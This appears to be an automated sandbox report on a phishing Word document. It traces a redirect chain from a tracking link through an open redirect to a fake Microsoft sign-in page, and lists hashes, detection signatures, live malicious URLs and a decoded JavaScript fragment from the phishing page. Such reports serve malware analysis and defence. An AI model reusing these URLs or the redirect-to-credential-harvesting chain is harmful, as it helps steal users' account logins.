Edit tour

Windows Analysis Report
NoteID [4962398] _Secure_Document_Mrettinger-46568.docx

Overview

General Information

Sample name:	NoteID [4962398] _Secure_Document_Mrettinger-46568.docx
Analysis ID:	1557885
MD5:	4ef613368d8ef55921e44d21e92b817a
SHA1:	11b679e827ded5df7e6b115800cfe79847fbba5b
SHA256:	31712310b311a29b04380f8056ae5123b413a43f9eda5d399997d4da9f143d79
Infos:

Detection

HTMLPhisher

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus detection for URL or domain

Yara detected HtmlPhish10

AI detected suspicious URL

Detected use of open redirect vulnerability

Allocates memory with a write watch (potentially for evading sandboxes)

Detected suspicious crossdomain redirect

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden javascript code

HTML title does not match URL

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Queries the volume information (name, serial number etc) of a device

Stores files to the Windows start menu directory

Unable to load, office file is protected or invalid

Classification

Process Tree

System is w10x64_ra

WINWORD.EXE (PID: 6004 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\NoteID [4962398] _Secure_Document_Mrettinger-46568.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)

chrome.exe (PID: 6496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 6752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1920,i,2782846156800102121,14241505822711078173,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

Cortana.exe (PID: 8080 cmdline: "C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe" -ServerName:App.AppX2y379sjp88wjq1y80217mddj3fargf2y.mca MD5: 2474F6359B2686EBCC034214ECDA6253)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
2.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://timesofvartha.com/favicon.ico	Avira URL Cloud: Label: malware
Source: https://timesofvartha.com/cloudflare-challenge/	Avira URL Cloud: Label: malware
Source: https://bc1qlpk73pgj3dz02nq8d9kpdxk.org/	Avira URL Cloud: Label: malware
Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/	Avira URL Cloud: Label: malware
Source: https://timesofvartha.com/cloudflare-challenge/#	Avira URL Cloud: Label: malware
Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#	Avira URL Cloud: Label: malware
Source: https://timesofvartha.com/cdn-cgi/challenge-platform/h/b/rc/8e497d813cb62ff4	Avira URL Cloud: Label: malware

Phishing

AI detected phishing page

Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.com

Joe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'timesofvartha.com' does not match the legitimate domain for Microsoft., The domain 'timesofvartha.com' does not have any known association with Microsoft., The URL does not contain any recognizable elements related to Microsoft, which is suspicious., The input fields labeled as 'unknown' do not provide any context or relevance to Microsoft, increasing suspicion. DOM: 2.4.pages.csv

Yara detected HtmlPhish10

Source: Yara match

File source: 2.4.pages.csv, type: HTML

AI detected suspicious URL

Source: Email	Joe Sandbox AI: AI detected Brand spoofing attempt in URL: https://timesofvartha.com
Source: Email	Joe Sandbox AI: AI detected Typosquatting in URL: https://timesofvartha.com

Detected use of open redirect vulnerability

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

HTTP traffic: Proxy from: r.neurotags.net/?e=email-activity&h=prod&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=read more.&r=https://sepedatua.com/158983/secure-redirect to https://sepedatua.com/158983/secure-redirect

Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.com

HTTP Parser: Number of links: 0

Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.com

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.com

HTTP Parser: Base64 decoded: function gv() {var vrs = {};var ps = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {vrs[key] = value;});return vrs;}let cfg = gv()['cfg'];if (typeof cfg === 'undefined'){cfg ...

Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.com

HTTP Parser: Title: Sign in to your account does not match URL

Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.com

HTTP Parser: <input type="password" .../> found

Source: https://timesofvartha.com/cloudflare-challenge/#Mrettinger@dcndx.com	HTTP Parser: No favicon
Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.com	HTTP Parser: No favicon

Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.com

HTTP Parser: No <meta name="author".. found

Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.com

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.17:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.17:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.179:443 -> 192.168.2.17:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.108.10.254:443 -> 192.168.2.17:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.108.10.254:443 -> 192.168.2.17:49856 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

HTTP traffic: Redirect from: r.neurotags.net to https://sepedatua.com/158983/secure-redirect

Source: global traffic

HTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br

Source: Joe Sandbox View	IP Address: 13.107.246.44 13.107.246.44
Source: Joe Sandbox View	IP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox View	IP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox View	IP Address: 154.216.17.193 154.216.17.193

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68

Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ePsK7ZCVA7dfvLb&MD=7twsYf23 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect HTTP/1.1Host: r.neurotags.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /158983/secure-redirect HTTP/1.1Host: sepedatua.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /158983/secure-redirect/ HTTP/1.1Host: sepedatua.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cloudflare-challenge/ HTTP/1.1Host: timesofvartha.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://sepedatua.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e497d813cb62ff4&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: timesofvartha.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://timesofvartha.com/cloudflare-challenge/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e497d813cb62ff4&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8e497d813cb62ff4/1731948951564/p8JSJGxodSL51Dr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8e497d813cb62ff4/1731948951564/p8JSJGxodSL51Dr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8e497d813cb62ff4/1731948951576/044ddceecbee23a905e087f0dcbf9c62295d312b4bb3ef95c5855d29fd2991d0/qFAA1Rd1fZGxcNU HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /auth-signin-apibridge_481736uyg7y73hdui21/ HTTP/1.1Host: timesofvartha.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://timesofvartha.com/cloudflare-challenge/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ePsK7ZCVA7dfvLb&MD=7twsYf23 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
